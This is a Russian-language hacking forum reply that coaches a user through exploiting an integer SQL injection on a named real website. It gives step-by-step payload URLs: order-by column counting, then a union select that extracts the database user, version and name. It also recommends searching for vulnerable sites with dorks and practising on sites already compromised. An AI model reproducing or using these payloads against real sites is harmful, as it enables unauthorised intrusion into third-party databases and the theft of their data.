19.10.2015, 12:36
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от aldemko
↑
подскажите что не так делаю ?
спасиобо
Сообщение от Br@!ns
↑
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+
- TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+
- FALSE
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+
- TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=...4,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
Хотел добавить - мануалы это НЕ инструкция к конкретным типам сайтов, это всего лишь общий алгоритм действий, а для понимания каждой конкретной ситуации мануалов надо прочитать много. И при поиске по доркам абсолютно не факт, что вы найдете сайты с аналогичными уязвимостями. Причин для этого много - например этот сайт уже ломали и кодер уже пытался "залатать" дыру.
В песочнице, в конкурсе много сайтов живых и уже "расковырянных" - попробуйте с ними "поиграться".
Ну и мое решение к этому вопросу:
Код:
http://herorace.ru/news-full.php?id=-1 union select 1,2,version(),4,database(),6
|
|
|